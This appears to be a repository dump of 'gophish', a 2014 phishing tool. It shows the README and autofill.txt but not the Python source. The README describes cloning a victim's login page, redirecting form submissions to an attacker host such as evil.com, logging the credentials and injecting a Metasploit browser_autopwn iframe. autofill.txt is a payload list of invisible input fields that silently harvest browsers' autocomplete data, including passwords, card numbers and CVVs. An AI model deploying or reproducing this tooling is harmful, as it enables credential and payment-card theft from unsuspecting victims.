├── LICENSE
├── README.md
├── autofill.txt
├── gophish.py
├── gophishsave.py
└── ua.txt


/LICENSE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2014, codewatchorg
 2 | All rights reserved.
 3 | 
 4 | Redistribution and use in source and binary forms, with or without
 5 | modification, are permitted provided that the following conditions are met:
 6 | 
 7 | * Redistributions of source code must retain the above copyright notice, this
 8 |   list of conditions and the following disclaimer.
 9 | 
10 | * Redistributions in binary form must reproduce the above copyright notice,
11 |   this list of conditions and the following disclaimer in the documentation
12 |   and/or other materials provided with the distribution.
13 | 
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
18 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
19 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
20 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
21 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
22 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
23 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
24 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | gophish
 2 | =======
 3 | 
 4 | GoPhish is a phishing script that enables rapid deployment of phishing sites.
 5 | 
 6 | Requirements
 7 | ============
 8 | Mechanize
 9 | CherryPy
10 | BeautifulSoup
11 | 
12 | Usage
13 | =====
14 | 
15 | gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE]
16 |                   [--listen LISTEN] [--port PORT] [--ssl]
17 |                   [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]
18 |                   [--autopwn AUTOPWN] [--autofill AUTOFILL]
19 |                   [--redirect REDIRECT] [--redirectto REDIRECTTO]
20 |                   [--landing LANDING] [--clickthrough CLICKTHROUGH]
21 |                   [--clickable CLICKABLE] [--useragent USERAGENT]
22 |                   [--sendcookies]
23 | 
24 |   Automatically setup a phishing site.
25 | 
26 |   optional arguments:
27 |   
28 |     -h, --help            show this help message and exit
29 |     
30 |     --phish PHISH         the full URL to phish back to the victim (must include
31 |                           http(s)://) (default: None)
32 |     --replace REPLACE     the IP/FQDN to replace FORM actions with (must include
33 |                           http(s):// and final /) (default: None)
34 |     --logfile LOGFILE     log file to store submitted form values (default:
35 |                           phishlog.txt)
36 |     --listen LISTEN       the IP to bind to (default: 0.0.0.0)
37 |     --port PORT           the port to start the listening web server on
38 |                           (default: 80)
39 |     --ssl                 enable SSL on the running port (default: 0)
40 |     --sslchain SSLCHAIN   certificate chain file to use when ssl option is
41 |                           enabled (default: chain.crt)
42 |     --sslcert SSLCERT     certificate file to use to use when ssl option is
43 |                           enabled (default: ssl.crt)
44 |     --sslkey SSLKEY       private key file to use to use when ssl option is
45 |                           enabled (default: ssl.key)
46 |     --autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to
47 |                           inject as an iFrame (default: None)
48 |     --autofill AUTOFILL   file to use to autosubmit autocomplete fields
49 |                           (default: None)
50 |     --redirect REDIRECT   redirect requests for this address somewhere else
51 |                           (default: None)
52 |     --redirectto REDIRECTTO
53 |                           redirect requests in the redirect option to this
54 |                           address (full link, must include http(s)://) (default:
55 |                           www.google.com)
56 |     --landing LANDING     redirect to this landing page instead of original site
57 |                           after form is submitted (include full link) (default:
58 |                           None)
59 |     --clickthrough CLICKTHROUGH
60 |                           file to serve up after user enters form credentials on
61 |                           main phish page (default: None)
62 |     --clickable CLICKABLE
63 |                           used in combination with clickthrough, comma separated
64 |                           list of files to serve based on requested name
65 |                           (default: None)
66 |     --useragent USERAGENT
67 |                           file to use to pass a user agent value in the request
68 |                           (default: None)
69 |     --sendcookies         initiate a connection, get the cookies, send cookies
70 |                           back in second connection (default: 1)
71 | 
72 |   Example: gophish.py --phish https://www.victim.com/login.php --replace
73 |     https://www.evil.com/ --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt
74 |     --sslkey ssl.key
75 | 


--------------------------------------------------------------------------------
/autofill.txt:
--------------------------------------------------------------------------------
  1 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Cellular" x-autocompletetype="vCard.Cellular" id="vCard.Cellular" name="vCard.Cellular"/
  2 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Company" x-autocompletetype="vCard.Company" id="vCard.Company" name="vCard.Company"/
  3 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Department" x-autocompletetype="vCard.Department" id="vCard.Department" name="vCard.Department"/
  4 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.DisplayName" x-autocompletetype="vCard.DisplayName" id="vCard.DisplayName" name="vCard.DisplayName"/
  5 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Email" x-autocompletetype="vCard.Email" id="vCard.Email" name="vCard.Email"/
  6 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.FirstName" x-autocompletetype="vCard.FirstName" id="vCard.FirstName" name="vCard.FirstName"/
  7 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Home.City" x-autocompletetype="vCard.Home.City" id="vCard.Home.City" name="vCard.Home.City"/
  8 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Home.Country" x-autocompletetype="vCard.Home.Country" id="vCard.Home.Country" name="vCard.Home.Country"/
  9 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Home.Phone" x-autocompletetype="vCard.Home.Phone" id="vCard.Home.Phone" name="vCard.Home.Phone"/
 10 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Home.State" x-autocompletetype="vCard.Home.State" id="vCard.Home.State" name="vCard.Home.State"/
 11 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Home.StreetAddress" x-autocompletetype="vCard.Home.StreetAddress" id="vCard.Home.StreetAddress" name="vCard.Home.StreetAddress"/
 12 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Home.Zipcode" x-autocompletetype="vCard.Home.Zipcode" id="vCard.Home.Zipcode" name="vCard.Home.Zipcode"/
 13 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Homepage" x-autocompletetype="vCard.Homepage" id="vCard.Homepage" name="vCard.Homepage"/
 14 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.JobTitle" x-autocompletetype="vCard.JobTitle" id="vCard.JobTitle" name="vCard.JobTitle"/
 15 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.LastName" x-autocompletetype="vCard.LastName" id="vCard.LastName" name="vCard.LastName"/
 16 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Notes" x-autocompletetype="vCard.Notes" id="vCard.Notes" name="vCard.Notes"/
 17 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Office" x-autocompletetype="vCard.Office" id="vCard.Office" name="vCard.Office"/
 18 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.City" x-autocompletetype="vCard.Business.City" id="vCard.Business.City" name="vCard.Business.City"/
 19 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.Country" x-autocompletetype="vCard.Business.Country" id="vCard.Business.Country" name="vCard.Business.Country"/
 20 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.Phone" x-autocompletetype="vCard.Business.Phone" id="vCard.Business.Phone" name="vCard.Business.Phone"/
 21 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.State" x-autocompletetype="vCard.Business.State" id="vCard.Business.State" name="vCard.Business.State"/
 22 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.StreetAddress" x-autocompletetype="vCard.Business.StreetAddress" id="vCard.Business.StreetAddress" name="vCard.Business.StreetAddress"/
 23 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.URL" x-autocompletetype="vCard.Business.URL" id="vCard.Business.URL" name="vCard.Business.URL"/
 24 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="vCard.Business.Zipcode" x-autocompletetype="vCard.Business.Zipcode" id="vCard.Business.Zipcode" name="vCard.Business.Zipcode"/
 25 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_Name_First" x-autocompletetype="Ecom_ShipTo_Postal_Name_First" id="Ecom_ShipTo_Postal_Name_First" name="Ecom_ShipTo_Postal_Name_First"/
 26 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_Name_Last" x-autocompletetype="Ecom_ShipTo_Postal_Name_Last" id="Ecom_ShipTo_Postal_Name_Last" name="Ecom_ShipTo_Postal_Name_Last"/
 27 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_Company" x-autocompletetype="Ecom_ShipTo_Postal_Company" id="Ecom_ShipTo_Postal_Company" name="Ecom_ShipTo_Postal_Company"/
 28 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_Street_Line1" x-autocompletetype="Ecom_ShipTo_Postal_Street_Line1" id="Ecom_ShipTo_Postal_Street_Line1" name="Ecom_ShipTo_Postal_Street_Line1"/
 29 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_City" x-autocompletetype="Ecom_ShipTo_Postal_City" id="Ecom_ShipTo_Postal_City" name="Ecom_ShipTo_Postal_City"/
 30 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_StateProv" x-autocompletetype="Ecom_ShipTo_Postal_StateProv" id="Ecom_ShipTo_Postal_StateProv" name="Ecom_ShipTo_Postal_StateProv"/
 31 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_PostalCode" x-autocompletetype="Ecom_ShipTo_Postal_PostalCode" id="Ecom_ShipTo_Postal_PostalCode" name="Ecom_ShipTo_Postal_PostalCode"/
 32 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Postal_Phone_Number" x-autocompletetype="Ecom_ShipTo_Postal_Phone_Number" id="Ecom_ShipTo_Postal_Phone_Number" name="Ecom_ShipTo_Postal_Phone_Number"/
 33 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ShipTo_Online_Email" x-autocompletetype="Ecom_ShipTo_Online_Email" id="Ecom_ShipTo_Online_Email" name="Ecom_ShipTo_Online_Email"/
 34 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_Name_First" x-autocompletetype="Ecom_BillTo_Postal_Name_First" id="Ecom_BillTo_Postal_Name_First" name="Ecom_BillTo_Postal_Name_First"/
 35 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_Name_Last" x-autocompletetype="Ecom_BillTo_Postal_Name_Last" id="Ecom_BillTo_Postal_Name_Last" name="Ecom_BillTo_Postal_Name_Last"/
 36 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_Company" x-autocompletetype="Ecom_BillTo_Postal_Company" id="Ecom_BillTo_Postal_Company" name="Ecom_BillTo_Postal_Company"/
 37 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_Street_Line1" x-autocompletetype="Ecom_BillTo_Postal_Street_Line1" id="Ecom_BillTo_Postal_Street_Line1" name="Ecom_BillTo_Postal_Street_Line1"/
 38 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_City" x-autocompletetype="Ecom_BillTo_Postal_City" id="Ecom_BillTo_Postal_City" name="Ecom_BillTo_Postal_City"/
 39 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_StateProv" x-autocompletetype="Ecom_BillTo_Postal_StateProv" id="Ecom_BillTo_Postal_StateProv" name="Ecom_BillTo_Postal_StateProv"/
 40 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_PostalCode" x-autocompletetype="Ecom_BillTo_Postal_PostalCode" id="Ecom_BillTo_Postal_PostalCode" name="Ecom_BillTo_Postal_PostalCode"/
 41 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Postal_CountryCode" x-autocompletetype="Ecom_BillTo_Postal_CountryCode" id="Ecom_BillTo_Postal_CountryCode" name="Ecom_BillTo_Postal_CountryCode"/
 42 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Telecom_Phone_Number" x-autocompletetype="Ecom_BillTo_Telecom_Phone_Number" id="Ecom_BillTo_Telecom_Phone_Number" name="Ecom_BillTo_Telecom_Phone_Number"/
 43 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_BillTo_Online_Email" x-autocompletetype="Ecom_BillTo_Online_Email" id="Ecom_BillTo_Online_Email" name="Ecom_BillTo_Online_Email"/
 44 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_Name_First" x-autocompletetype="Ecom_ReceiptTo_Postal_Name_First" id="Ecom_ReceiptTo_Postal_Name_First" name="Ecom_ReceiptTo_Postal_Name_First"/
 45 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_Name_Last" x-autocompletetype="Ecom_ReceiptTo_Postal_Name_Last" id="Ecom_ReceiptTo_Postal_Name_Last" name="Ecom_ReceiptTo_Postal_Name_Last"/
 46 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_Company" x-autocompletetype="Ecom_ReceiptTo_Postal_Company" id="Ecom_ReceiptTo_Postal_Company" name="Ecom_ReceiptTo_Postal_Company"/
 47 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_Street_Line1" x-autocompletetype="Ecom_ReceiptTo_Postal_Street_Line1" id="Ecom_ReceiptTo_Postal_Street_Line1" name="Ecom_ReceiptTo_Postal_Street_Line1"/
 48 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_City" x-autocompletetype="Ecom_ReceiptTo_Postal_City" id="Ecom_ReceiptTo_Postal_City" name="Ecom_ReceiptTo_Postal_City"/
 49 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_StateProv" x-autocompletetype="Ecom_ReceiptTo_Postal_StateProv" id="Ecom_ReceiptTo_Postal_StateProv" name="Ecom_ReceiptTo_Postal_StateProv"/
 50 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_PostalCode" x-autocompletetype="Ecom_ReceiptTo_Postal_PostalCode" id="Ecom_ReceiptTo_Postal_PostalCode" name="Ecom_ReceiptTo_Postal_PostalCode"/
 51 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Postal_CountryCode" x-autocompletetype="Ecom_ReceiptTo_Postal_CountryCode" id="Ecom_ReceiptTo_Postal_CountryCode" name="Ecom_ReceiptTo_Postal_CountryCode"/
 52 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Telecom_Phone_Number" x-autocompletetype="Ecom_ReceiptTo_Telecom_Phone_Number" id="Ecom_ReceiptTo_Telecom_Phone_Number" name="Ecom_ReceiptTo_Telecom_Phone_Number"/
 53 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_ReceiptTo_Online_Email" x-autocompletetype="Ecom_ReceiptTo_Online_Email" id="Ecom_ReceiptTo_Online_Email" name="Ecom_ReceiptTo_Online_Email"/
 54 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_Name" x-autocompletetype="Ecom_Payment_Card_Name" id="Ecom_Payment_Card_Name" name="Ecom_Payment_Card_Name"/
 55 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_Type" x-autocompletetype="Ecom_Payment_Card_Type" id="Ecom_Payment_Card_Type" name="Ecom_Payment_Card_Type"/
 56 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_Number" x-autocompletetype="Ecom_Payment_Card_Number" id="Ecom_Payment_Card_Number" name="Ecom_Payment_Card_Number"/
 57 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_Verification" x-autocompletetype="Ecom_Payment_Card_Verification" id="Ecom_Payment_Card_Verification" name="Ecom_Payment_Card_Verification"/
 58 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_ExpDate_Day" x-autocompletetype="Ecom_Payment_Card_ExpDate_Day" id="Ecom_Payment_Card_ExpDate_Day" name="Ecom_Payment_Card_ExpDate_Day"/
 59 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_ExpDate_Month" x-autocompletetype="Ecom_Payment_Card_ExpDate_Month" id="Ecom_Payment_Card_ExpDate_Month" name="Ecom_Payment_Card_ExpDate_Month"/
 60 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_Payment_Card_ExpDate_Year" x-autocompletetype="Ecom_Payment_Card_ExpDate_Year" id="Ecom_Payment_Card_ExpDate_Year" name="Ecom_Payment_Card_ExpDate_Year"/
 61 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_User_ID" x-autocompletetype="Ecom_User_ID" id="Ecom_User_ID" name="Ecom_User_ID"/
 62 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="Ecom_User_Password" x-autocompletetype="Ecom_User_Password" id="Ecom_User_Password" name="Ecom_User_Password"/
 63 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="first" x-autocompletetype="first" id="first" name="first"/
 64 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="first name" x-autocompletetype="first name" id="first name" name="first name"/
 65 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="fname" x-autocompletetype="fname" id="fname" name="fname"/
 66 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="firstname" x-autocompletetype="firstname" id="firstname" name="firstname"/
 67 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="given name" x-autocompletetype="given name" id="given name" name="given name"/
 68 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="last" x-autocompletetype="last" id="last" name="last"/
 69 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="last name" x-autocompletetype="last name" id="last name" name="last name"/
 70 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="lname" x-autocompletetype="lname" id="lname" name="lname"/
 71 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="lastname" x-autocompletetype="lastname" id="lastname" name="lastname"/
 72 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="name" x-autocompletetype="name" id="name" name="name"/
 73 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="birthday" x-autocompletetype="birthday" id="birthday" name="birthday"/
 74 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="date of birth" x-autocompletetype="date of birth" id="date of birth" name="date of birth"/
 75 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="born" x-autocompletetype="born" id="born" name="born"/
 76 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="job title" x-autocompletetype="job title" id="job title" name="job title"/
 77 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="jobtitle" x-autocompletetype="jobtitle" id="jobtitle" name="jobtitle"/
 78 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="email" x-autocompletetype="email" id="email" name="email"/
 79 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="e-mail" x-autocompletetype="e-mail" id="e-mail" name="e-mail"/
 80 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="street" x-autocompletetype="street" id="street" name="street"/
 81 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="street address" x-autocompletetype="street address" id="street address" name="street address"/
 82 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="streetaddress" x-autocompletetype="streetaddress" id="streetaddress" name="streetaddress"/
 83 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="address1" x-autocompletetype="address1" id="address1" name="address1"/
 84 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="address 1" x-autocompletetype="address 1" id="address 1" name="address 1"/
 85 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="address" x-autocompletetype="address" id="address" name="address"/
 86 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="city" x-autocompletetype="city" id="city" name="city"/
 87 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="state" x-autocompletetype="state" id="state" name="state"/
 88 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="zip" x-autocompletetype="zip" id="zip" name="zip"/
 89 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="zipcode" x-autocompletetype="zipcode" id="zipcode" name="zipcode"/
 90 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="zip code" x-autocompletetype="zip code" id="zip code" name="zip code"/
 91 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="postalcode" x-autocompletetype="postalcode" id="postalcode" name="postalcode"/
 92 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="postal code" x-autocompletetype="postal code" id="postal code" name="postal code"/
 93 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="country" x-autocompletetype="country" id="country" name="country"/
 94 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="workphone" x-autocompletetype="workphone" id="workphone" name="workphone"/
 95 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="work phone" x-autocompletetype="work phone" id="work phone" name="work phone"/
 96 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="companyphone" x-autocompletetype="companyphone" id="companyphone" name="companyphone"/
 97 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="company phone" x-autocompletetype="company phone" id="company phone" name="company phone"/
 98 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="businessphone" x-autocompletetype="businessphone" id="businessphone" name="businessphone"/
 99 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="business phone" x-autocompletetype="business phone" id="business phone" name="business phone"/
100 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="mobilephone" x-autocompletetype="mobilephone" id="mobilephone" name="mobilephone"/
101 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="mobile phone" x-autocompletetype="mobile phone" id="mobile phone" name="mobile phone"/
102 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="cellphone" x-autocompletetype="cellphone" id="cellphone" name="cellphone"/
